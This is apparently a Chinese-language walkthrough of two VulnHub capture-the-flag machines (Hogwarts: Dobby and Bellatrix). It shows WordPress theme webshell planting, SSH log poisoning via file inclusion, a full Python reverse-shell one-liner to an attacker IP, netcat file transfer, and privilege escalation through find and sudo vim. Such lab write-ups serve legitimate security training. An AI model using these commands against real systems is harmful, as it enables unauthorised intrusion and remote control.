vulnhub:Hogwarts系列
Hogwarts: Dobby
0x01 信息收集
nmap命令进行主机发现和端口扫描,发现目标主机仅开放80端口。

访问80端口发现网页title似乎是一个base编码字符串。

curl http://192.168.56.228/,除了title的字符串以外还有发现。
<title>Draco:dG9vIGVhc3kgbm8/IFBvdHRlcg==</title>
<!--
See: /alohomora
-->
base64解码得到:too easy no? Potter。访问/alohomora目录,提示:Draco's password is his house ;),draco的密码是他的房子,百度得到Malfoy Manor
目录扫描。

/log,依旧是base64解码得到密码::ilikesocks

/DiagonAlley/

有一段brainFuck编码,但是解不出来。
+++++ +++++ [->++ +++++ +++<] >.<++ +[->+ ++<]> ++.<+ ++[-> —<] >—- ..<++ ++[-> ++++< ]>+++ ++++. <++++ [->– –<]> .<+++ [->++ +<]>+ .<+++ +[->- —<] >–.< ++++[ ->+++ +<]>+ +++.- -.<++ +[->- –<]> —– .<+++ [->++ +<]>+ +++.<
不过一看blog和页面布局,猜测wordpress,下拉页面到底部的确找到wordpress。
0x02 wpscan爆破后台用户密码
wpscan --url xxxx -e u,p,t

存在用户draco和Draco,结合前面提示试试密码是不是Malfoy Manor,大小写删除空格都试了,不行。根据Draco's house联想到他所在的学院slytherin。
draco:slytherin,成功登录到后台。
0x03 wordpress Theme getshell
查看当前主题,修改对应主题文件。例如:往404.php写入kali的反弹shell。

开启监听,访问http://192.168.56.228/DiagonAlley/index.php/blog/+任意字符串反弹shell。

0x04 suid提权
在dobby家目录下找到flag1.txt,没有cat命令就用nl命令替代。
flag1{28327a4964cb391d74111a185a5047ad}
dobby,前面有一个密码::ilikesocks没用,这俩很容易联想到一起。经过尝试这组用户名密码是:dobby:ilikesocks

试试sudo提权,无果。
find / -perm -u=s 2>/dev/null,find命令可以试试。

/usr/bin/find . -exec /bin/sh -p \; -quit
成功提权。


Hogwarts: Bellatrix
0x01 信息收集
nmap扫描主机,开放端口:22,80.

访问80端口,F12检查页面元素,找到提示:存在一个php文件有文件包含漏洞,并且参数是file。页面内容最后一行有php字样,找规律,发现在重复ikilledsiriusblack,试试ikilledsiriusblack.php

尝试包含ssh登录日志文件/var/log/auth.log,有回显内容。
0x02 ssh日志文件投毒
存在文件包含漏洞,且能读取到ssh登录日志,接下来就是利用。
只需要两步:
-
首先ssh连接时将用户名修改为一句话木马(推荐用远程连接软件)。验证是否写入成功。
http://192.168.56.229/ikilledsiriusblack.php?file=../../../var/log/auth.log&cmd=id
-
通过命令执行反弹shell。
&cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.109",9527));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

通过python3获得完整TTY:python3 -c 'import pty;pty.spawn("/bin/bash")'
0x03 密码哈希爆破
/var/www/html/c2VjcmV0cw==目录下两个文件,分别是lestrange的密码哈希和一个字典文件。

nc命令将两个文件传输至攻击机方便使用。
-
接收方:
nc -l -p 端口号 > 文件名 -
发送方:
nc IP地址 端口号 < 文件名
john指定字典破解。
john --wordlist=hash_dict.txt Swordofgryffindor
lestrange:ihateharrypotter

0x04 sudo提权
切换到lestrange,sudo -l,vim命令可用。

sudo vim -c ':!/bin/sh'


更多推荐
所有评论(0)